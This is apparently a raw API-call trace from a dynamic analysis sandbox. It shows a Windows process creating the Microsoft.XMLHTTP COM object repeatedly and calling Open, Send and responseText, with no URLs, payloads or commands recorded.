	[0855.804] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.804] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0855.804] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.804] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0855.804] ??2@YAPEAX_K@Z () returned 0x62f310
	[0855.804] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0855.804] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.804] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0855.804] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0855.804] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0855.804] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.804] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.807] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.807] SysStringLen (param_1=0x0) returned 0x0
	[0855.807] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0855.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.807] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0855.807] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.807] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0855.808] ??2@YAPEAX_K@Z () returned 0x62f330
	[0855.808] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0855.808] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.808] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0855.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0855.808] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0855.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.808] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.808] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.808] SysStringLen (param_1=0x0) returned 0x0
	[0855.808] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0855.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.808] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0855.809] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0855.809] ??2@YAPEAX_K@Z () returned 0x62f310
	[0855.809] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0855.809] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.809] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0855.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0855.809] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0855.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.809] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.809] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.809] SysStringLen (param_1=0x0) returned 0x0
	[0855.809] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.810] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0855.810] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0855.810] ??2@YAPEAX_K@Z () returned 0x62f330
	[0855.810] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.810] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0855.810] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.810] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.810] longjmp () 
	[0855.811] longjmp () 
	[0855.811] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.811] SysStringLen (param_1=0x0) returned 0x0
	[0855.811] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0855.811] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.811] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0855.811] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.811] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0855.811] ??2@YAPEAX_K@Z () returned 0x62f310
	[0855.811] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0855.811] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.811] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0855.811] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0855.811] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0855.811] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.811] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.812] longjmp () 
	[0855.812] longjmp () 
	[0855.812] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.812] SysStringLen (param_1=0x0) returned 0x0
	[0855.812] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0855.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0855.812] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0855.812] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0855.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0855.812] ??2@YAPEAX_K@Z () returned 0x62f330
	[0855.812] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0855.812] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0855.812] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0855.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0855.812] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0855.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.813] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0855.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0855.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0855.813] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0855.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0856.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0856.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0856.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
